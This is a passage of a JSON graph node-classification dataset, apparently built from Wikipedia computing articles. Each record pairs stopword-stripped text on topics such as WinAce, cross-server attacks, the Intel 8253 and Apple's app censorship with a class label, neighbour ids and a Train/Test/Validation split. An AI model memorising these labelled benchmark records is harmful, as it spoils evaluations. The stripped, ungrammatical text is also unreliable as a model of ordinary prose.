    "text": "WinAce:winace winace archiving program windows ace compressed archive format built-in support common archive formats types zip rar cab also offer freeware free software command-line interface decompression including listing testing program called unace macos linux beginning version 2.65 winace bundled whenu savenow adware program bundle removed current version 2.69 replaced opt-in sponsorship deal via trialpay application seems discontinued since n't seen updates since 2007 august 2017 also official website www.winace.com went offline web.archive.org snapshots july 2017 last ones show domain parked message text-based version dos called commandline ace addition ace format built-in support common archive format types arj rar zip partially lzh program distribution contains commandline ace unace decompressor programs versions dos os/2 windows support long file names despite name commandline ace contains full-fledged norton commander-like interface run commandline fullscreen mode unace run commandline mode commandline ace used file manipulation similar existing norton commander",
    "neighbors": [
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
      7983,
      950,
      823,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      4459,
      877,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 7530,
    "label": 4,
    "text": "XSA:xsa computer science xsa better known cross-server attack networking security intrusion method allows malicious client compromise security website service server using implemented services server may secure general xsa demonstrated websites yet sometimes used conjunction services located server xsa method allows malicious client use services remote server implements order attack another service server network website hosting companies offer hosting large even little amounts separate websites vulnerable method attack amount access services php webserver give client allows client access website configurations files passwords like term 'xsa first coined deadlydata prominent computer hacker early 2000s voice communications software teamspeak invented pioneered method intrusion coined shortened term describe act performing cross-server attacks xsas used community supports methods subsets method give computer hacker malicious individuals terminology attack websites using software located server",
    "neighbors": [
      8644,
      2470
    ],
    "mask": "Test"
  },
  {
    "node_id": 7531,
    "label": 2,
    "text": "Quaject:quaject computer science quaject object-like data structure containing data code pointers code exposed interface form callentries accept list callentries quajects callbacks callouts developed alexia massalin 1989 synthesis kernel named qua machine unique hardware platform built massalin origin term 'qua unclear massalin claims humorously sound made koalas main purpose quajects provide abstraction manage self-modifying code allowing runtime code optimizing per-object basis original synthesis kernel required quajects written hand-developed assembly language done avoid developing complex compiler massalin noted just-in-time compilation jit high-level programming language permits runtime code generation lisp smalltalk also apply approach though also asserted complexity compiler likely prohibitive quajects differ conventional objects two key ways first always use form dependency injection pattern manage interfaces quajects continuations quaject list callentry references part quaject creation may updated quaject lifetime second critically given quaject set methods unique specific quaject methods type class quajects stored one templates rather fixed code shared methods accessed common table pointers individual quajects also methods generated specifically tailor performance quaject behavior",
    "neighbors": [
      8609,
      9330,
      477,
      6502
    ],
    "mask": "None"
  },
  {
    "node_id": 7532,
    "label": 7,
    "text": "ZipBooks:zipbooks zipbooks accounting software company based american fork utah produces software name zipbooks founded tim chaves june 2015 backed venture capital firm peak ventures company secured additional 2 million funding july 2016 2017 awarded 100,000 economic grant utah governor office economic development technology commercialization innovation program zipbooks core modules invoicing transactions bills reporting time tracking contacts payroll accrual accounting added 2017 application available g suite ios slack web application computerworld compared zipbooks favorably accounting software pc magazine praised user experience stated lacked lot features competing sites offer",
    "neighbors": [
      7489,
      1539,
      5224,
      11113,
      10509,
      7983,
      1008,
      1680,
      467,
      8307,
      6367
    ],
    "mask": "Train"
  },
  {
    "node_id": 7533,
    "label": 7,
    "text": "Zapier:zapier zapier american for-profit corporation web-based service allows end users integrate web applications use although zapier based sunnyvale california employs workforce 200 employees located around united states 13 countries zapier started columbia missouri co-founders wade foster bryan helmig mike knoop part first startup weekend columbia 2011 initially submitting application winter 2012 funding cycle rejected built initial prototype 25 apps accepted combinator startup seed accelerator summer 2012 funding cycle result acceptance company relocated mountain view california spring 2012 october year zapier received 1.3 million seed funding round led global venture investment firm bessemer venture partners zapier reached profitability 2014 march 2017 company offered de-location package consisting 10,000 moving reimbursement employees desired move away san francisco bay area widely reported zapier entire workforce works remotely package result increasing housing costs company desire help local employees improve standard living shortly job applications increased 30 employees taken advantage offer zapier provides workflows automate use web applications together often described translator web apis",
    "neighbors": [
      3462,
      8554,
      10517,
      8117,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 7534,
    "label": 2,
    "text": "CRUX:crux crux lightweight x86-64-optimized linux distribution targeted experienced linux users delivered tar.gz-based package system bsd-style initscripts based linux distribution also utilizes ports system install upgrade applications although crux latin word cross choice name crux meaning per lidén chose sounded cool ends x puts line various unix flavors irix ultrix mac os x ibm aix crux include gui installation program instead user boots kernel stored either cd diskette partitions hard disk drive operating system installed using program fdisk cfdisk creates appropriate file systems various partitions mounts cd nfs share along partitions made previously use package installation script compiles new kernel installs bootloader via shell commands crux implements infrastructure similar bsd-based operating systems package management packages consist pkgfile shell script patches required adjust program work md5sum hashes used verify integrity downloaded files footprint file listing files included packages files downloaded crux software repository compiled installed using prt-get frontend pkgutils software sources downloaded websites respective upstream address specified pkgfile simone rota reviewed crux osnews blog named reviewr reviewed crux 2.2",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      3097,
      543,
      11297,
      9762,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      10387,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      4264,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      2811,
      8957,
      4355,
      7435,
      2321,
      788,
      5397,
      6934,
      4887,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      11121,
      9074,
      5492,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      451,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      10732,
      495,
      2545,
      8177,
      8180,
      2550,
      5110,
      8700,
      11263
    ],
    "mask": "Train"
  },
  {
    "node_id": 7535,
    "label": 9,
    "text": "Real-time_Cmix:real-time cmix real-time cmix rtcmix one music-n family computer music programming languages rtcmix descended mix program developed paul lansky princeton university 1978 perform algorithmic composition using digital audio soundfiles ibm 3031 mainframe computer synthesis functions added program renamed cmix 1980s real-time capability added brad garton david topper mid-1990s support tcp socket connectivity interactive control scheduler object-oriented embedding synthesis engine fully featured applications years cmix/rtcmix run variety computer platforms operating systems including next sun microsystems irix linux mac os x always open source project differentiating commercial synthesizers music software currently developed group computer music researchers princeton columbia university university virginia rtcmix number unique highly unusual features compared synthesis signal processing languages one built-in minc parser enables user write c-style code within score file extending innate capability algorithmic composition making closer respects later music software supercollider max/msp uses single-script instruction file score file synthesis signal processing routines called instruments exist compile shared libraries different music-n languages csound instruments exist second file written specification language builds routines simple building blocks organized opcodes unit generators rtcmix similar functionality csound computer music languages however shared lineage means scripts written one language extremely familiar-looking immediately comprehensible users language",
    "neighbors": [
      7172,
      8958,
      7571,
      6933,
      6810,
      10924,
      5037,
      823,
      7611,
      9023,
      9665,
      3665,
      7769,
      9565,
      7550,
      372,
      9210,
      2045,
      7806
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7536,
    "label": 2,
    "text": "Tatung_Einstein:tatung einstein tatung einstein eight-bit home/personal computer produced taiwanese corporation tatung designed bradford england tatung research laboratories assembled bridgnorth telford england aimed primarily small businesses einstein released united kingdom summer 1984 5,000 exported back taipei later year tatung monitor monochrome colour dot matrix printer also available options plus external disc drives 80 column display card also capable emulating spectrum 48k speculator addon expensive rivals einstein popular contemporary programmers commercially unsuccessful later revised version called tatung einstein 256 suffered similar fate machine physically large option one two built-in three-inch floppy disk drives manufactured hitachi time home computers used ordinary tape recorders storage another unusual feature einstein start-up computer entered simple machine code monitor called mos machine operating system variety software could loaded disk including cp/m-compatible operating system called xtal dos pronounced 'crystal dos created crystal computers torquay basic interpreter xtal basic thanks reliability machine ample memory machine proved useful many software houses use programming porting code machines made namely spectrum 48k amstrad cpc commodore 64 eventually superseded pc atari st development systems choice follow machine einstein256 basically original improved video yamaha v9938 slimline black case like msx specification",
    "neighbors": [
      10533,
      2822,
      11462,
      9322,
      4109,
      4110,
      7983,
      1776,
      9006,
      11311,
      9651,
      181,
      4409,
      1403,
      2460,
      8830,
      4991
    ],
    "mask": "None"
  },
  {
    "node_id": 7537,
    "label": 7,
    "text": "Serverless_computing:serverless computing serverless computing cloud-computing execution model cloud provider runs server dynamically manages allocation machine resources pricing based actual amount resources consumed application rather pre-purchased units capacity form utility computing serverless computing simplify process deploying code production scaling capacity planning maintenance operations may hidden developer operator serverless code used conjunction code deployed traditional styles microservices alternatively applications written purely serverless use provisioned servers confused computing networking models require actual server function like peer-to-peer p2p serverless vendors offer compute runtimes also known function service faas platforms execute application logic store data first pay go code execution platform zimki released 2006 commercially successful 2008 google released google app engine featured metered billing applications used custom python framework could execute arbitrary code picloud released 2010 offered faas support python aws lambda introduced amazon 2014 first public cloud infrastructure vendor abstract serverless computing offering google cloud platform offers google cloud functions since 2016 ibm offers ibm cloud functions public ibm cloud since 2016 microsoft azure offers azure functions offered azure public cloud on-premises via azure stack oracle introduced fn project open source serverless computing framework offered oracle cloud platform available github deployment platforms addition number open source serverless projects various levels popularity usage openwhisk initially developed ibm contributions redhat adobe others openwhisk core technology ibm cloud functions project riff open source serverless platform implementation built kubernetes pivotal software project riff foundation pivotal function service several serverless databases emerged last years systems extend serverless execution model rdbms eliminating need provision scale virtualized physical database hardware amazon aurora offers serverless version databases based mysql postgresql providing on-demand auto-scaling configurations azure data lake highly scalable data storage analytics service service hosted azure microsoft public cloud azure data lake analytics provides distributed infrastructure dynamically allocate de-allocate resources customers pay services use google cloud datastore eventually-consistent document store offers database component google app engine standalone service firebase also owned google includes hierarchical database available via fixed pay-as-you-go plans faunadb cloud serverless managed offering faunadb cloud accessed via function-as-a-service provider faunadb cloud data replicated across multiple datacenters running amazon web services google cloud platform microsoft azure serverless cost-effective renting purchasing fixed quantity servers generally involves significant periods underutilization idle time even cost-efficient provisioning autoscaling group due efficient bin-packing underlying machine resources described pay-as-you-go computing bare-code charged based solely upon time memory allocated run code without associated fees idle time immediate cost benefits related lack operating systems costs including licences installation dependencies maintenance support patching addition serverless architecture means developers operators need spend time setting tuning autoscaling policies systems cloud provider responsible scaling capacity demand.. google puts ‘ prototype production planet-scale. ’ cloud native systems inherently scale well systems known elastic rather scalable small teams developers able run code without dependence upon teams infrastructure support engineers developers becoming devops skilled distinctions software developer hardware engineer blurring function service units code exposed outside world simple functions means typically programmer worry multithreading directly handling http requests code simplifying task back-end software development infrequently-used serverless code may suffer greater response latency code continuously running dedicated server virtual machine container unlike autoscaling cloud provider typically spins serverless code completely use means runtime example java runtime requires significant amount time start create additional latency serverless computing suited computing workloads high-performance computing resource limits imposed cloud providers also would likely cheaper bulk-provision number servers believed required given point time diagnosing performance excessive resource usage problems serverless code may difficult traditional server code although entire functions timed typically ability dig detail attaching profilers debuggers apm tools furthermore environment code runs typically open source performance characteristics precisely replicated local environment serverless sometimes mistakenly considered secure traditional architectures true extent os vulnerabilities taken care cloud provider total attack surface significantly larger many components application compared traditional architectures component entry point serverless application moreover security solutions customers used protect cloud workloads become irrelevant customers control install anything endpoint network level intrusion detection/prevention system ids/ips intensified mono-culture properties entire server network single flaw applied globally solution secure serverless apps close partnership developers devops appsec find balance developers ’ security ’ absolved responsibility either take steps make everyone ’ problem create cross-functional teams work towards tight integration security specialists development teams collaborate organization resolve security risks speed serverless many serverless function environments based proprietary public cloud environments privacy implications considered shared resources access external employees however serverless computing also done private cloud environment even on-premises using example kubernetes platform gives companies full control privacy mechanisms hosting traditional server setups serverless computing covered international data center authority idca framework ae360 however part related portability issue moving business logic one public cloud another docker solution created cloud native computing foundation cncf also working developing specification oracle serverless computing provided third-party service applications software run serverless environment default locked specific cloud vendor therefore serverless cause multiple issues migration serverless frameworks designed make easier build test deploy serverless applications notable frameworks include",
    "neighbors": [
      7054,
      1935,
      3993,
      154,
      6438,
      1959,
      939,
      11692,
      5677,
      8640,
      6856,
      7248,
      2641,
      7889,
      11221,
      2263,
      8539,
      2910,
      4194,
      7022,
      2418,
      8181,
      7802,
      6395,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 7538,
    "label": 3,
    "text": "Intel_8253:intel 8253 intel 8253 8254 programmable interval timers pits perform timing counting functions using three 16-bit counters 825x family primarily designed intel 8080/8085-processors later used x86 compatible systems 825x chips equivalent circuit embedded larger chip found ibm pc compatibles pc compatibles timer channel 0 assigned irq-0 highest priority hardware interrupt timer channel 1 assigned dram refresh least early models 80386 timer channel 2 assigned pc speaker intel 82c54 c cmos logic variant handles 10 mhz clock signals 8253 described 1980 intel component data catalog publication 8254 described superset 8253 higher clock speed ratings preliminary data sheet 1982 intel component data catalog 8254 implemented hmos read back command available 8253 permits reading writing counter interleaved modern pc compatibles either using system chip cpus discrete chipsets typically implement full 8254 compatibility backward compatibility interoperability read back command vital i/o feature interoperability multicore cpus gpus timer three counters numbered 0 2 channel programmed operate one six modes programmed channels operate independently counter two input pins – clk clock input gate – one pin data output three counters 16-bit counters independent easily read cpu operation mode pit changed setting hardware signals example write control word register one needs set =0 =1 =0 a1=a0=1 initialize counters microprocessor must write control word cw register done setting proper values pins read/write logic block sending control word data/bus buffer block control word register contains 8 bits labeled d7..d0 d7 msb decoding somewhat complex values set parameters one three counters however two forms setting pit microprocessor first sends control message count message pit counting process start pit received messages cases detects rising edge gate input signal status byte format bit 7 allows software monitor current state pin bit 6 indicates count read bit 1 counting element yet loaded read back processor bits 5 0 last bits written control register d3 d2 d1 bits control word set operating mode timer 6 modes total modes 2 3 d3 bit ignored missing modes 6 7 aliases modes 2 3 modes sensitive gate input gate high causing normal operation effects gate low depend mode mode 0 used generation accurate time delay software control mode counter start counting initial count value loaded 0 counting rate equal input clock frequency pin set low control word written counting starts one clock cycle count programmed remains low counter reaches 0 point set high counter reloaded control word written counter wraps around codice_1 internally continues counting pin never changes gate signal remain active high normal counting gate goes low counting suspended resumes goes high first byte new count loaded count register stops previous count mode 8253 used monostable multivibrator gate input used trigger input initially high go low clock pulse following trigger begin one-shot pulse remain low counter reaches zero go high remain high clk pulse next trigger writing control word initial count counter armed trigger results loading counter setting low next clk pulse thus starting one-shot pulse initial count n result one-shot pulse n clk cycles duration one-shot retriggerable hence remain low n clk pulses trigger one-shot pulse repeated without rewriting count counter gate effect new count written counter oneshot pulse current one-shot affected unless counter retriggered case counter loaded new count oneshot pulse continues new count expires mode device acts divide-by-n counter commonly used generate real-time clock interrupt like modes counting process start next clock cycle count sent remain high counter reaches 1 go low one clock pulse following cycle count reloaded goes high whole process repeats time high pulses depends preset count counter register calculated using following formula value loaded counter formula_1 note values count register range formula_2 1 register never reaches zero mode similar mode 2 however duration high low clock pulses output different mode 2 suppose formula_2 number loaded counter count message output high formula_4 counts low formula_5 counts thus period formula_2 counts formula_2 odd extra half-cycle spent high control word count loaded output remain high counter reaches zero counter generate low pulse 1 clock cycle strobe – output become high gate low suspends count resumes gate goes high mode similar mode 4 however counting process triggered gate input receiving control word count output set high device detects rising edge gate input start counting counter reaches 0 output go low one clock cycle – become high repeat cycle next rising edge gate 8253 used ibm pc compatibles since introduction 1981 modern times pit included separate chip x86 pc rather functionality included part motherboard chipset southbridge modern chipset change may show form noticeably faster access pit registers x86 i/o address space pc compatibles operate pit clock rate 105/88 1.193 mhz ntsc colorburst frequency frequency divided 2 largest divisor 8253 capable produces ≈18.2 hz timer interrupt used ms-dos related operating systems original ibm pcs counter 0 used generate timekeeping interrupt counter 1 a1=0 a0=1 used trigger refresh dram memory last counter a1=1 a0=0 used generate tones via pc speaker newer motherboards include additional counters advanced configuration power interface acpi counter local advanced programmable interrupt controller local apic high precision event timer cpu also provides time stamp counter tsc facility pcs address timer0 chip port 40h..43h second timer1 chip 50h..53h x86 pcs many video card bios system bios reprogram second counter use reprogramming typically happens video mode changes video bios may executed system management mode power saving state changes system bios may executed prevents serious alternative uses timer second counter many x86 systems timer used system x86 pcs channel 0 clock ticks theoretical value 1193181.8181 ... hz i.e one third ntsc color subcarrier frequency comes dividing system clock 14.31818 mhz 12 holdover first cga pcs – derived necessary frequencies single quartz crystal make tv output possible oscillator run multiple ntsc color subcarrier frequency stated channel 0 implemented counter typically initial value counter set sending bytes control data i/o port registers value 36h sent port 43h low byte port 40h port 40h high byte counter counts zero sends hardware interrupt irq 0 int 8 cpu counter resets initial value begins count fastest possible interrupt frequency little half megahertz slowest possible frequency also one normally used computers running ms-dos compatible operating systems 18.2 hz real mode operating systems bios accumulates number int 8 calls receives real mode address 0040:006c read program timer counts value also read directly reading i/o port twice first low byte high byte however free-running counter applications x86 pc necessary first write latch command desired channel control register bytes read belong one value according 2002 microsoft document reads writes hardware 8254 require communication io port programming takes several cycles prohibitively expensive os aperiodic functionality used practice",
    "neighbors": [
      5922,
      5348,
      9861,
      3272,
      2861,
      9166,
      1776,
      6129,
      499,
      5080,
      8090
    ],
    "mask": "Test"
  },
  {
    "node_id": 7539,
    "label": 9,
    "text": "RTML:rtml rtml proprietary programming language used exclusively yahoo yahoo store yahoo site web hosting services language originated viaweb company founded 1995 paul graham robert t. morris template language e-commerce platform rtml stands robert t. morris language rtml editor offered option customers usually small businesses wanted customize online stores built-in templates allowed built-in templates also written rtml provided starting point people used language 1998 yahoo bought viaweb 49.6 million renamed service yahoo store yahoo later offered rtml-based content management system hosting platform without shopping cart name yahoo site 2003 yahoo renamed yahoo store service yahoo merchant solutions part yahoo small business time began offering new customers choice standard php/mysql web hosting environment instead rtml-based store editor many new yahoo merchant solutions sites legacy yahoo stores continue built using store editor rtml although yahoo documentation mention rtml actually implemented top lisp-based system language somewhat unusual programmer edit source code directly text instead keywords presented hyperlinks browser-based html interface clicking keyword selects attributes edited blocks code pushed popped clipboard using stack metaphor editor maintains code s-expression structure automatically visually represents web interface using indentation instead lisp parentheses keywords correspond html elements also conditionals recursion control flow features make real programming language rtml templates evaluated dynamically pageview editing live site publish process generates static html files yahoo documentation used say rtml acronym real time markup language graham admitted made various explanations rtml supposed stand actually named robert morris founder viaweb whose username rtm",
    "neighbors": [
      1347,
      8644,
      3336,
      9,
      8735,
      7022,
      11023,
      4564,
      311,
      345,
      7805,
      319
    ],
    "mask": "None"
  },
  {
    "node_id": 7540,
    "label": 3,
    "text": "Open_(system_call):open system call file systems program initializes access file file system using open system call allocates resources associated file file descriptor returns handle process use refer file cases open performed first access file may opened simultaneously several processes even process resulting several file descriptors file depending file organization filesystem operations descriptors moving file pointer closing independentthey affect descriptors file operations file write seen operations descriptors later read read newly written data codice_1 filesystem may allocate memory buffers may wait first operation absolute file path resolved may include connecting remote host notifying operator removable medium required may include initialization communication device point error may returned host medium available first access least directory within filesystem performed error usually returned higher level components path directories located accessed error returned file expected exist file already exist file expected exist file access restricted permission flags within file meta data access control list validated requested type operations usually requires additional filesystem access although filesystems meta-flags may part directory structure file created filesystem may allocate default initial amount storage specified amount depending file system capabilities fails error returned updating directory new entry may performed may delayed close performed various errors may occur open include directory update failures un-permitted multiple connections media failures communication link failures device failures return value must always examined error specific action taken many cases programming language-specific run-time library opens may perform additional actions including initializing run-time library structure related file soon file longer needed program close cause run-time library filesystem buffers updated physical media permit processes access data exclusive use required run-time libraries may close file program calls run-time exit filesystems may perform necessary operations program terminates neither likely take place event kernel power failure cause damaged filesystem structures requiring running privileged lengthy filesystem utilities entire filesystem may inaccessible using file process close file using close call takes file descriptor file closed filesystems include disposition permit releasing file computer languages include run-time libraries include additional functionality particular filesystems open auxiliary routine may include specifications key size record size connection speed open routines include specification program code executed event error example perl also uses codice_2 function codice_3 module associate array file codice_4 function associates hash file open call standardized posix specification c language value returned file descriptor reference process specific structure contains among things position pointer indicates place file acted upon next operation open may return −1 indicating failure codice_5 detailing error file system also updates global table open files used determining file currently use process name file open includes file path defining file system file found created codice_6 expects relative path argument formed or'ing together optional parameters fcntl.h one option parameters include additional flags errors defined open call codice_15 implemented fopen uses string flags codice_16 codice_17 codice_18 codice_19 returns file pointer used fgets fputs fclose optional relevant creating new file defines file permissions include read write execute file owner group users mode masked calling process umask bits set umask cleared mode",
    "neighbors": [
      4616,
      3082,
      10785,
      9762,
      6180,
      5158,
      8242,
      52,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      9840,
      5244,
      4734,
      11391,
      7821,
      4238,
      10382,
      2711,
      6808,
      9882,
      6813,
      1694,
      2723,
      10407,
      1193,
      8364,
      10933,
      5822,
      5824,
      1736,
      2762,
      6352,
      6358,
      4831,
      8928,
      2278,
      233,
      7403,
      10482,
      246,
      8438,
      8439,
      2809,
      3330,
      1291,
      4367,
      792,
      8988,
      10016,
      295,
      1844,
      823,
      1336,
      6968,
      7992,
      9533,
      318,
      3911,
      4423,
      6988,
      10063,
      5969,
      5975,
      11095,
      10091,
      8573,
      2432,
      8066,
      900,
      8582,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      7603,
      1972,
      3522,
      9667,
      3526,
      457,
      2529,
      6625,
      8676,
      1509,
      2021,
      1513,
      6126,
      3055,
      7663,
      5105,
      3571,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7541,
    "label": 4,
    "text": "Censorship_by_Apple:censorship apple censorship apple refers apple inc. removal omission disruption spread content information services subsidiaries itunes store app store ios order comply apple company policies legal demands various government censorship laws ibooks description moby-dick censored sperm whale april 2010 according daily telegraph four erotic books including blonde wet complete story allegedly removed top 10 chart july 26 2010 northwest press repeated conflicts apple content limitations sales ibooks store 2011 adaptation tom bouden oscar wilde play importance earnest approved addition black bars cover partial male nudity technology company initially permitted individual issues jon macy fearful hunter rejected collected edition removed issues satirical al-qaeda super secret weapon rejected outright 2016 northwest published self-censored version hard swallow justin hall dave davenport – covering objectionable parts images apples – original version rejected due sexual content policy censoring profanity song titles itunes resulted scunthorpe glitch inoffensive titles censored due coincidental string letters song explicit label marked explicit next song title song marked explicit unavailable purchase restrict explicit content checked parental controls preference often clean mark next title songs meaning lyrics censored available purchase accounts generally song marked clean explicit version available well august 6th 2018 apple removed one podcasts created infowars website owned alex jones right-wing american conspiracy theorist radio-show host content creator apple cited hate speech reason removal content apple decision remove content sparked major technology companies including facebook youtube spotify google removing infowars content may 2009 apple rejected first version newspapers iphone app let users read content 50+ newspapers around world including new york times france le monde united kingdom tabloid sun app rejected topless page 3 girls daily features described obscene second version application submitted removing access sun adding price tag £0.59 app made available summer release iphone 3.0 software another application similar nature 'newspapers called 'eucalyptus allowed users download e-books iphone though rejected apple one e-books could downloaded kama sutra ban since lifted app store playboy sports illustrated adult-rated apps yet removed apps others removed citing adult content resulted accusations hypocrisy despite adult sites continue market iphone ipad users november 2009 application stern mainstream german weekly magazine print circulation 900,000 deleted several weeks without warning january 2010 europe largest newspaper german tabloid bild removed content iphone version print edition request apple later modify one applications like stern case nudity association german magazine publishers vdz warned interventions apple might moving towards censorship november 26 2010 informational magazine google os danish publisher mediaprovider n't allowed app store guardian described rejection explicit content apple analogous distributor wh smith main distributor many years imposed content restrictions british publishers workers fashion magazine dazed confused nicknamed ipad edition iran edition december 2009 apple banned cartoon app called newstoons cartoonist mark fiore grounds ridiculed public figures april 2010 fiore pulitzer prize political satire cartoons making history first internet-only cartoonist win prestigious journalistic prize following public outcry story broke wake award apple asked fiore resubmit app subsequently accepted fiore said sure mine might get approved someone n't pulitzer maybe making better political app mine need media frenzy get app approved political material april 2009 game called baby shaker approved app store later removed due complaints game allowed user shake phone image cartoon baby screen died may 2009 trent reznor rock band nine inch nails announced via twitter account apple rejected update nine inch nails application due objectionable content developer posted message nine inch nails discussion boards explaining situation apple later permitted update december 2009 ted lando ebook app take control iphone os 3 rejected apple app permitted back app store references jailbreaking removed 2011 apple banned game called phone story explored ethical challenges smartphone manufacturing including conflict minerals environmental waste troubled labor practices game eventually published web creator molleindustria august 2012 josh begley created iphone app sent push notification whenever u.s. military uav struck target app rejected apple finding content objectionable crude march 11 2013 hiddenapps approved appeared app store app provided access developer diagnostic menus allowed stock apps hidden enabled opt-out feature iads apple developer driven advertisement system july 2013 tech education startup called treehouse claimed apple refused let release ios app contained lessons android video game papers please centered around operation border checkpoint brought ipad december 2014 developer lucas pope forced remove pixellated nudity game full-body scanner allowed release game apple devices days pope permitted upload full version game app store including pixellated nudity apparent reversal apple however still rated 17+ app store may 4 2015 apple removed france musique application app store due airing inappropriate content podcast application displayed painting édouard manet olympia depicting mild nudity podcast application submitted app store 17+ rating october 2015 apple rejected custom streaming application apple tv created members frankfurt branch chaos computer club europe largest hacker association application meant show recordings talks chaos computer club conferences according blog post written incident apple reason videos show hack apple devices recordings publicly available hosted youtube well using youtube app still allows playback content apple devices apple banned video game binding isaac appearing ios app store due cartoon depictions violence towards children february 2018 apple removed telegram telegram x encrypted messaging applications made telegram messenger llp app store due content deemed inappropriate apple specifically cited instances child pornography made available users subsequently banned apps situation could dealt apple removed infowars app app store september 2018 citing content violated policy indecent material apple ban simply prevents users downloading app restrict access app installed november 2018 apple removed tumblr app app store due tumblr failure filter child pornography tumblr uses database known child pornography automatically detect remove child pornography website however found evidence images database present tumblr response ban tumblr removed instances child pornography since moved ban pornographic material platform december 17th 2018 december 2018 apple removed strategy game afghanistan '11 due fact featured real-life combatants slitherine developers game countered main objectives focused supporting afghan civilians rather defeating taliban followed temporary ban game ultimate general gettysburg featuring confederate flag historical context following instances censorship information control imposed apple app stores united states app store many imposed due pressure foreign governments put effect comply laws early 2017 apple restricted emoji flag taiwan devices used china 2018 apple restrictions sending word taiwan sending emoji representing flag taiwan idevices using chinese country code language settings caused devices crash 2018 apple removed apps chinese app store allowed users access content forbidden chinese government many apps gave users access virtual private networks could allow circumvent great firewall china apple cite chinese laws claimed apps broke laws local governments among apps removed vyprvpn app golden frog company filed amicus brief supporting apple fbi–apple encryption dispute apple first foreign global technology company concede chinese government demands 2019 bitter winter daily magazine human rights religious liberty china reported app also removed chinese app store artists reference tiananmen square protests music removed itunes including jacky cheung hok-yau tat ming pair february 2017 apple restricted payment services iranian apps comply u.s. sanctions forbade iranian currency entering united states iranian apps responded implementing iranian electronic payment service august 2017 apple removed many iranian apps app store citing u.s. sanctions placed iran apple neither stores iran specific versions app store country iranian citizens able get access apple products content external sources apple removed many apps developed specifically iranians including ride-sharing service called snapp food delivery service called delionfoods april 2018 apple blocked telegram app iran response concerns access encrypted messaging service presented threat iranian national security may 2018 apple played role censorship telegram encrypted messaging app used globally interested surveying encrypted messages russian government demanded telegram provide decryption keys federal security service telegram refused russian government threatened apple legal repercussions block telegram russian app store eliminate push notification feature founder telegram pavel durov publicly claimed apple restricted telegram users across world updating app action could cause problems telegram ability meet regulations",
    "neighbors": [
      9732,
      1317,
      7869,
      9063,
      2282,
      171,
      1070,
      11695,
      6000,
      1169,
      6834,
      9233,
      10417,
      5749,
      3991,
      1692,
      4957
    ],
    "mask": "None"
  },
  {
    "node_id": 7542,
    "label": 4,
    "text": "Scott_Vanstone:scott vanstone scott a. vanstone mathematician cryptographer university waterloo faculty mathematics member school centre applied cryptographic research also founder cybersecurity company certicom received phd 1974 university waterloo decade worked principally combinatorial design theory finite geometry finite fields 1980s started working cryptography early result vanstone joint ian blake r. fuji-hara ron mullin improved algorithm computing discrete logarithms binary fields inspired coppersmith develop famous exp n^ 1/3+ε algorithm n degree field vanstone one first see commercial potential elliptic curve cryptography ecc much subsequent work devoted developing ecc algorithms protocols standards 1985 co-founded certicom later became chief developer promoter ecc vanstone authored coauthored five widely-used books almost two hundred research articles held several patents fellow royal society canada fellow international association cryptologic research 2001 rsa award excellence mathematics 2009 received ontario premier catalyst award lifetime achievement innovation died march 2 2014 shortly cancer diagnosis notes",
    "neighbors": [
      2074,
      8674,
      2580,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 7543,
    "label": 9,
    "text": "Mozilla_Raindrop:mozilla raindrop raindrop messaging application building apache couchdb used web interface raindrop works collecting messages currently emails tweets available addons storing json optionally attachments couchdb served users couchdb webserver users view web browsers december 2009 prototype testers official stable release raindrop introduced mozilla foundation thursday october 22 2009 exploration messaging innovation led team responsible thunderbird explore new ways use open web technologies create useful compelling messaging experiences february 2014 mozilla raindrop project considered inactive",
    "neighbors": [
      1664,
      6791,
      9736,
      1295,
      7951,
      2836,
      10006,
      11418,
      9757,
      803,
      7983,
      1713,
      7861,
      11449,
      5054,
      9152,
      9281,
      10057,
      2893,
      7889,
      5078,
      6231,
      10078,
      482,
      10722,
      8169,
      5612,
      10860,
      6133,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "Train"
  },
  {
    "node_id": 7544,
    "label": 2,
